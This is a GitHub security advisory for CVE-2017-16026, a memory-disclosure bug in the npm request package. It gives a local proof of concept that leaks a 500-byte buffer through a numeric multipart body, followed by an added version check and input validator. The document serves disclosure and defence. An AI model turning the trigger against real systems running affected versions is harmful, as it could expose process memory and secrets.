Remote Memory Exposure in request

Moderate severity GitHub Reviewed Published Nov 9, 2018 • Updated Jan 8, 2021

Package

npm request (npm)

Affected versions

>= 2.49.0, < 2.68.0
>= 2.2.6, < 2.47.0

Patched versions

2.68.0
2.68.0

Description

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made and the type of a part's body is number, a buffer of that size is allocated and sent to the remote server as the body.

Proof of Concept

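var request = require('request');
var http = require('http');

// Local server that logs every chunk of request body it receives.
var serveFunction = function (req, res) {
    req.on('data', function (data) {
        console.log(data);
    });
    res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

// The multipart part's body is a number rather than a string or Buffer,
// so affected versions allocate a 500-byte buffer and send it as the body.
request({
    method: "POST",
    uri: 'http://localhost:8000',
    multipart: [{body: 500}]
}, function (err, res, body) {});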

Recommendation

Update to version 2.68.0 or later
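
The following is an added example, not code from the advisory or from the request project. It checks a version string against the affected ranges listed above and rejects multipart parts whose body is not a string or Buffer before they reach request(); all function names are hypothetical, and the string-or-Buffer policy is this example's assumption.

```javascript
// Added example; function names are hypothetical, not part of request's API.
// Affected ranges copied from the advisory: [inclusive lower, exclusive upper).
const AFFECTED_RANGES = [
  ['2.49.0', '2.68.0'],
  ['2.2.6', '2.47.0'],
];

// Parse "x.y.z" into numbers; pre-release/build suffixes are ignored (assumption).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new TypeError('not a semver version: ' + v);
  return m.slice(1).map(Number);
}

function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

function isAffectedRequestVersion(version) {
  return AFFECTED_RANGES.some(([lo, hi]) =>
    compareVersions(version, lo) >= 0 && compareVersions(version, hi) < 0);
}

// Defence in depth for callers: refuse any multipart part whose body is not a
// string or Buffer, so a number taken from untrusted JSON never reaches request().
function assertSafeMultipart(parts) {
  if (!Array.isArray(parts)) throw new TypeError('multipart must be an array');
  parts.forEach((part, i) => {
    const body = part && part.body;
    if (typeof body !== 'string' && !Buffer.isBuffer(body)) {
      throw new TypeError('multipart[' + i + '].body has type ' + typeof body);
    }
  });
  return parts;
}

// Constructed sample input: the part from the proof of concept is rejected.
try {
  assertSafeMultipart([{ body: 500 }]);
} catch (e) {
  console.log('rejected:', e.message);
}
console.log(isAffectedRequestVersion('2.67.0'), isAffectedRequestVersion('2.68.0'));
```

Versions 2.47.0 and 2.48.0 fall between the two listed ranges, so the check reports them as not affected.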

References

Severity

Moderate

Weaknesses

CVE ID

CVE-2017-16026

GHSA ID

GHSA-7xfp-9c55-5vqj

Source code

No known source code